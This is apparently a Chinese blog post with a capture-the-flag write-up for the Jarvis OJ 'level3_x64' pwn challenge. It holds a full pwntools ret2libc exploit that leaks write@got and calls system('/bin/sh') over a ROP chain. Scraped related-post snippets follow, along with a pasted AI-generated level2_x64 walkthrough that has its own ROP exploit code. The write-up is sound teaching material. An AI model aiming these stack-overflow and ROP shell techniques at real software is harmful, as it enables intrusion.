(Jarvis Oj)(Pwn) level3_x64

最新推荐文章于 2025-02-22 10:26:47 发布
原创 最新推荐文章于 2025-02-22 10:26:47 发布 · 1k 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了64位版本的 Jarvis Oj Pwn level3_x64 的解决方法。与32位版本类似,主要思路不变,但需要注意64位下函数参数传递的不同,主要通过寄存器完成。作者分享了构造ROP链的脚本。

(Jarvis Oj)(Pwn) level3_x64

这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: 

from pwn import *                                                                                                      
#conn=process('./level3_x64')
conn=remote("pwn2.jarvisoj.com", "9883")
e=ELF('./level3_x64')
#libc=ELF('/usr/lib64/libc-2.26.so')
libc=ELF('./libc-2.19.so')
pad=0x80
vul_addr=0x4005e6
write_plt=e.symbols['write']
write_got=e.got['write']
pop_rdi=0x4006b3 #pop rdi;ret
pop_rsi=0x4006b1 #pop rsi;pop r15;ret
#edx=0x200 is not serious
payload1="A"*pad+"BBBBBBBB"+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(write_got)+"deadbuff"+p64(write_plt)+p64(vul_addr)
conn.recvuntil("Input:\n")
conn.sendline(payload1)
write_addr=u64(conn.recv(8))
#print write_addr 
libc_write=libc.symbols['write']
libc_system=libc.symbols['system']
libc_sh=libc.search('/bin/sh').next()
system_addr=(libc_system-libc_write)+write_addr
sh_addr=(libc_sh-libc_write)+write_addr
payload2="A"*pad+"BBBBBBBB"+p64(pop_rdi)+p64(sh_addr)+p64(system_addr)+"deadbuff"
conn.recvuntil("Input:\n")
conn.sendline(payload2)
conn.interactive()
jarvisoj_level3_x64
m0sway的博客
11-26 684
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 615
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
pwn3_x64
m0_49959202的博客
09-18 310
文章目录pwn3_x641.程序分析2.栈帧设计3.exp编写 pwn3_x64 1.程序分析 file一下,发现是64位程序: checksec一下,发现pie没开: ldd一下,找到需要的动态链接库: ida分析: 思路和上一题32位的一样,没啥好分析的 64位与32的不同在于传参:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9 因此需要ROP链找到rdi, rsi, rdx。 用ROPgadget查看下: 发现有现成的pop rdi; ret
JarvisOj pwn level3_x64
qq_44813849的博客
07-27 613
JarvisOj pwn level3_x64 这一道题和level3那道题很像,同样是一个压缩包里面有两个文件。 使用ROPgadget搜索操作寄存器的函数地址: 用ida打开level3_x64文件,找到主函数的地址 plt表和got表中的write地址 附上脚本 from pwn import * elf=ELF("level3_x64") write_plt=0x000000000...
JarvisOJ level3_x64
PLpa的博客
07-09 1139
这题和level3大同小异,只不过这一题是x64的程序 做这题之前,建议先写level2。 拿到这题,我们首先查看保护: 程序只开了NX保护,好的。 根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找): vul()函数: write()函数的plt地址: 之后我们找齐需要用的gadget: 但是我们并没有找到pop rdx ; ret,根据我们对w...
pwnjarvisoj_level2_x64
勿山几已
01-11 1053
缓冲区溢出漏洞导致漏洞利用system函数,64位程序利用rop设置函数参数
BUUCTF jarvisoj_level3_x64
2401_88087539的博客
02-22 474
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF Pwn jarvisoj_level2_x64 题解
qq_33348179的博客
12-05 525
运行 得到flag flag{4b1340f5-06be-4377-9630-fd2c77f016dd}这是64位程序 所以构造ROP链时要用rdi传参+用ret栈平衡。SHIFT+F12查找字符串 找到了binsh。看到输入的payload压入栈中了。1.下载 checksec。64位 用IDA64打开。函数里面也有system。
【BUUCTF-PWN】13-jarvisoj_level2_x64
燕麦葡萄干的博客
07-05 785
ret指令的地址,再接着是’/bin/sh’字符串的地址,最后是system()函数的地址。ret处,该指令会将当前栈顶的元素(‘/bin/sh’字符串的地址)出栈并存入rdi中,并返回到下一条指令处。此时栈中就只有system()函数的地址了,所以下一条指令正是system(),而它需要的参数正好就在rdi寄存器中,这样就执行了system(’/bin/sh’)现在只需要让函数返回到system,并传入参数“/bin/sh”就可以了。32位的比较简单,只需要返回地址+下一次的返回地址+参数1+参数2+…
BUUCTF jarvisoj_level3_x64 & jarvisoj_level4
红叶的博客
10-28 676
64位ELF 开启了NX,其余全部关闭。IDA Pro 静态调试除了改成了64位似乎都没什么区别,gdb动态调试。
Jarvis OJ - pwn level3-64
hanqdi_的博客
02-10 353
pwn - level3_x64 检查保护机制 只开启了NX保护,堆栈不可执行保护。 放入ida分析,发现read栈溢出。 思路:没有system和binsh的情况下,在read函数前有write函数运行,可以通过泄漏write函数的地址来泄漏libc版本,从而泄漏system和binsh地址。 泄漏write函数,需要调用write(1,write_got,0x08) ...
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 318
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 889
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
Jarvis OJ [XMAN]level3(x64)
九层台
07-09 1159
liu@liu-F117-F:~/桌面/oj/level3_x64$ checksec level3_x64 [*] '/home/liu/\xe6\xa1\x8c\xe9\x9d\xa2/oj/level3_x64/level3_x64' Arch: amd64-64-little RELRO: No RELRO Stack: No canary fo...
[BUUCTF-pwn]——jarvisoj_level3_x64
Y_peak的博客
02-22 306
[BUUCTF-pwn]——jarvisoj_level3_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level3_x64 点击查看 write up 博主有点懒,不想写第二遍。 ????
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 516
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
Jarvis Oj Pwn 学习笔记-level3
baoan4763的博客
05-31 212
你们期待的Libc终于来了~(return_to_libc attack) 跪呈链接: https://files.cnblogs.com/files/Magpie/level3.rar nc pwn2.jarvisoj.com 9879 checksec,依旧老样子: 端起IDA,elf和libc双双扔进锅里: 先看elf: 阔以阔以,libc类题目该有的函数(话...
jarvisoj_level2_x64解题步骤
最新发布
10-19
<think>我们正在处理CTF(Capture The Flag)竞赛中的二进制漏洞利用题目,具体是jarvisoj平台的level2_x64题目。根据用户需求,我们需要提供解题步骤。结合引用[3]中的内容,我们知道这是一个64位的栈溢出题目。 解题步骤通常包括: 1. 检查文件保护机制(使用checksec) 2. 静态分析(使用IDA或Ghidra反汇编) 3. 确定漏洞点和利用方式 4. 编写漏洞利用代码(EXP) 5. 获取flag 引用[3]提到了64位和32位调用约定的不同:64位使用寄存器传递前几个参数(rdi, rsi, rdx, rcx, r8, r9),然后才使用栈。因此,在构造ROP链的时候需要注意。 从题目名称(level2_x64)可以推测,这题与栈溢出有关,并且是64位程序。在level2中,通常存在一个可以溢出覆盖返回地址的缓冲区,并且程序中还有一个后门函数(如system函数)或我们可以利用的gadget。 根据常见解题思路,我们可能需要执行以下步骤: - 通过栈溢出覆盖返回地址,跳转到system函数,并传入"/bin/sh"字符串的地址。 - 由于64位程序参数传递规则不同,我们需要用ROP gadget来设置rdi寄存器(第一个参数)为我们控制的字符串地址。 具体步骤: 1. **检查保护机制**:使用`checksec`命令查看程序开启了哪些保护。通常,NX(堆栈不可执行)保护会开启,我们需要通过ROP绕过。 2. **静态分析**:用IDA打开程序,找到危险函数(如gets、read等),确定溢出点。同时查找是否有现成的system函数和"/bin/sh"字符串,或者我们可以写入字符串的位置。 3. **计算偏移**:确定从输入缓冲区到返回地址的偏移量。可以通过调试(如gdb)或模式字符串(pattern)来确定。 4. **构造ROP链**: - 如果程序中有`system`函数,我们可以直接调用。 - 需要设置第一个参数(rdi)为字符串"/bin/sh"的地址。因此,我们需要一个`pop rdi; ret`的gadget。 - 如果没有现成的字符串,我们还需要将字符串写入到已知地址(如.bss段)。 5. **编写EXP**:使用pwntools编写利用脚本。 现在,我们根据上述步骤详细说明: ### 解题步骤 #### 1. 检查保护机制 使用命令: ```bash checksec level2_x64 ``` 预期输出中,我们关注NX(堆栈不可执行)是否开启,以及是否有Canary(栈保护)和PIE(地址随机化)。通常,栈溢出题目NX开启,没有PIE(或者有PIE但我们可以泄漏地址)。 #### 2. 静态分析(IDA) 使用IDA打开程序,查看main函数和漏洞函数。通常,在main函数中会调用一个存在栈溢出的函数(如vulnerable_function)。在这个函数中,可能会使用`read`或`gets`等函数读取输入,且没有检查长度。 同时,我们还需要查找可利用的函数: - 查看是否有`system`函数(一般在导入表中)。 - 查看是否有`/bin/sh`字符串(可以使用`ROPgadget --binary level2_x64 --string &#39;/bin/sh&#39;`查找)。 - 如果没有现成的字符串,需要找到一个可写地址(如.bss段)并写入字符串。 另外,查找gadget: ```bash ROPgadget --binary level2_x64 --only &#39;pop|ret&#39; ``` 重点查找`pop rdi; ret`,因为我们需要用它来传递参数。 #### 3. 确定偏移 在溢出函数中,确定输入缓冲区到返回地址的偏移量。可以通过以下方式: - 在IDA中查看栈布局:缓冲区起始地址与保存的返回地址之间的偏移。 - 使用gdb调试,制造一个溢出,通过崩溃信息确定覆盖返回地址的位置。 - 使用pwntools的`cyclic`功能生成一段唯一字符串,触发崩溃后查看覆盖到返回地址的值,然后计算偏移。 #### 4. 构造ROP链 根据已有信息构造: - 如果有现成的`/bin/sh`字符串(假设地址为`binsh_addr`)和`system`函数地址(假设为`system_addr`),那么ROP链可以是: ``` [pop_rdi_ret, binsh_addr, system_addr] ``` - 如果没有,则需要先写入字符串。我们可以通过read函数将字符串读入到已知可写地址(如.bss段),然后再调用system。 #### 5. 编写EXP 使用pwntools编写Python脚本。注意,远程连接时需要知道远程服务的IP和端口。 ### 示例EXP结构 ```python from pwn import * context(arch=&#39;amd64&#39;, os=&#39;linux&#39;, log_level=&#39;debug&#39;) # 加载文件 elf = ELF(&#39;./level2_x64&#39;) # 确定偏移量 offset = 0x80 + 8 # 示例,具体根据实际情况 # 获取关键地址 pop_rdi = 0x4006b3 # 通过ROPgadget找到的pop rdi; ret地址 system_addr = elf.symbols[&#39;system&#39;] # 或者elf.plt[&#39;system&#39;] binsh_addr = next(elf.search(b&#39;/bin/sh&#39;)) # 查找字符串 # 构造payload payload = b&#39;A&#39; * offset payload += p64(pop_rdi) payload += p64(binsh_addr) payload += p64(system_addr) # 发送payload io = process(&#39;./level2_x64&#39;) # 本地测试 # io = remote(&#39;remote_ip&#39;, port) # 远程连接 io.sendlineafter(&#39;Input:&#39;, payload) # 根据程序输入提示调整 io.interactive() ``` 注意:上面的地址(如pop_rdi)需要根据实际题目替换。 ### 相关问题 §§相关问题§§ 1. 如何确定栈溢出的偏移量? 2. 如何查找程序中的ROP gadget? 3. 如果程序没有提供system函数和/bin/sh字符串,如何利用? 4. 64位程序与32位程序在漏洞利用上有何不同? 5. 如何利用pwntools进行远程漏洞利用? 请根据实际情况调整解题步骤和EXP。注意,具体题目细节可能有所不同,需要根据实际二进制文件进行分析。 </think>### jarvisoj平台level2_x64解题步骤 #### 1. **检查文件保护机制(checksec)** ```bash checksec level2_x64 ``` 预期输出: ``` Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found # 关键:无栈保护 NX: NX enabled # 堆栈不可执行 PIE: No PIE (0x400000) # 地址固定 ``` **关键点**:无栈溢出保护(Canary),但堆栈不可执行(NX),需使用ROP技术[^3]。 --- #### 2. **静态分析(IDA反编译)** - **漏洞定位**: 在`vulnerable_function()`中发现`read(0, buf, 0x200)`,而`buf`位于栈上(大小通常0x80),存在栈溢出。 - **可利用资源**: - 程序自带`system@plt`函数(地址固定) - 存在字符串`/bin/sh`(地址:`0x600A90`)[^3] - 可通过`ROPgadget`查找`pop rdi; ret`: ```bash ROPgadget --binary level2_x64 --only "pop|ret" | grep "rdi" ``` 输出示例:`0x4006b3 : pop rdi ; ret` --- #### 3. **计算溢出偏移量** - 使用`cyclic`生成测试字符串: ```bash gdb-pwndbg ./level2_x64 run <<< $(cyclic 200) ``` - 崩溃时查看`RSP`值(例如`0x6161616161616166`) - 计算偏移: ```bash cyclic -l 0x6161616166 ``` 典型偏移为 **`0x80 + 8`**(128字节缓冲区 + 8字节RBP)[^3]。 --- #### 4. **构造ROP链** ```python from pwn import * context(arch=&#39;amd64&#39;, os=&#39;linux&#39;) # 关键地址 pop_rdi_ret = 0x4006b3 # pop rdi; ret binsh_addr = 0x600A90 # "/bin/sh"字符串地址 system_plt = 0x4004C0 # system@plt # 构造payload payload = b&#39;A&#39; * 0x88 # 填充缓冲区+RBP payload += p64(pop_rdi_ret) # 设置RDI参数 payload += p64(binsh_addr) # RDI = "/bin/sh" payload += p64(system_plt) # 调用system ``` --- #### 5. **执行EXP获取shell** ```python if args.REMOTE: io = remote(&#39;node4.buuoj.cn&#39;, 12345) # 替换实际地址 else: io = process(&#39;./level2_x64&#39;) io.sendlineafter(b&#39;Input:\n&#39;, payload) io.interactive() # 进入交互式shell ``` **执行效果**: ```bash $ cat flag flag{example_flag} ``` --- ### 关键注意事项 1. **64位参数传递**:参数通过寄存器传递(第一参数用`RDI`),需用`pop rdi; ret`设置参数[^3]。 2. **NX绕过**:利用程序自身的`system`和`/bin/sh`避免shellcode执行。 3. **地址验证**:所有地址需通过`IDA`或`readelf`确认。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值